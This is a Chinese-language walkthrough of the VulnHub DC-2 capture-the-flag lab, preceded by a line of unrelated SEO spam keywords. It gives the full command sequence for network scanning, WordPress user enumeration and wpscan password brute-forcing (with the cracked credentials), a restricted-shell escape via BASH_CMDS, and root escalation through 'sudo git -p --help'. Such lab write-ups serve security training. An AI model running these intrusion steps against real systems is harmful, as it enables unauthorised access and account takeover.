jsp网站开发四酷全书,小程序模板源码免费下载,深圳有哪些软件外包公司,排名好的郑州网站建设写写自己打DC-2的过程
使用工具 kali DC-2的靶机下载地址为#xff1a;https://www.vulnhub.com/entry/dc-2,311/ 环境配置。
Kali和DC-2都设置为NAT模式#xff0c;都为仅主机模式也可以。
信息收集 arp-scan -l nmap -sn 192.168.236.0/24 获取靶机ip#xff1a;192.16…写写自己打DC-2的过程
使用工具 kali DC-2的靶机下载地址为https://www.vulnhub.com/entry/dc-2,311/ 环境配置。
Kali和DC-2都设置为NAT模式都为仅主机模式也可以。
信息收集 arp-scan -l nmap -sn 192.168.236.0/24 获取靶机ip192.168.236.140 扫描靶机端口 nmap -sS -T5 --min-rate 10000 192.168.236.140 -sC -p- 开放了80和7744端口
FLAG1
尝试访问一下DC-2:192.168.236.140 本地访问不了会自动跳到DC-2。应该是给重定向了
我们本地dns绑定下 可以访问本地hosts C:\Windows\System32\drivers\etc 修改hosts文件 修改不了的话右键属性 取消只读 保存就可以了 添加这样子的一条
重新访问就进去了发现下面有个flag得到第一个flag 点进去提示我们要使用cewl工具 Cewl是一款采用Ruby开发的应用程序你可以给它的爬虫指定URL地址和爬取深度还可以添额外的外部链接接下来Cewl会给你返回一个字典文件你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外Cewl还提供了命令行工具。 FLAG2
看看网站字典保存下来 cewl http://dc-2 -w passwd.txt 注意:本来用 cewl http://192.168.28.179 -w passwd.txt 的但是没有任何输出想想应该是ip给重定向了用域名就可以了。 cat passwd.txt 查看下字典 有了密码字典 还需要找用户名
用dirb来扫目录 发现经典的wordpress登录框admin.php非常有可能。我们去访问 网站我们拿到了 还需要账号
这一看就是Wordpress。
Wordpress有一个著名的扫描工具wpscan
缺用户名那么我们就 wpscan --url http://dc-2/ -e u //枚举用户名字 枚举出来的3个账号
admin jerry tom
将这三个用户名存储在一个文本文件中 使用wpscan爆破账号密码 wpscan --url http://dc-2/ -U user.txt -P passwd.txt 爆破出来了两组用户名和密码
jerry /adipiscing
tom / parturient
登录wordpress主页 登录成功
注意上面url有时候不会跳到http://dc-2/wp-admin/ 导致登录后空白可以登录后输入url 就可以进去了。
仔细找找多点点FLAG就出来了 提示说wordpress找不到其他的东西了
FLAG3
想起来了前面有个ssh改端口的改成了7744
然后也了个WordPress的账号密码可以尝试登录下 ssh jerry192.168.236.140 -p 7744 ssh tom192.168.236.140 -p 7744 尝试三次发现jerry无法登录 尝试tom用户成功登录 ls查看当前目录的文件 发现了flag3.txt
cat flag3.txt 发现命令无法使用 compgen -c //查看可以使用的指令 发现vi可以使用 vi flag3.txt 发现flag3.txt
FLAG4
提示说
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
可怜的老汤姆老是追杰瑞。也许他应该为他造成的所有压力负责。
发现tom只能使用less、ls、scp、vi命令无法直接使用su命令切换用户 BASH_CMDS[a]/bin/sh a #调用/bin/sh命令解释器 /bin/bash #使用bash命令解释器 export PATHPATH:/bin:/sbin:/usr/bin:/usr/sbin #设置环境变量 此时命令基本上都可以使用也可以table补全命令 切换到jerry用户进入jerry家目录下 su jerry adipiscing #jerry用户登录密码 ls 找到flag4.txt提示使用git 命令 Flag4
Good to see that youve made it this far - but youre not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - youre on your own now. :-)
Go on - git outta here!!!! sudo -l #查看可以使用root权限无密码的命令有git命令 sudo git -p –-help #提权 passwd root #修改root密码 123456 #密码修改为123456 su root #切换到root用户 cd /root #进入到root家目录下 ls #找到final-flag.txt 参考文章Vulnhub靶机实战——DC-2_dc-2靶机-CSDN博客
靶机练习DC-2靶机复现_dc-2靶场打完重置-CSDN博客
当然还有很多方法我这只是最简单的。
勿喷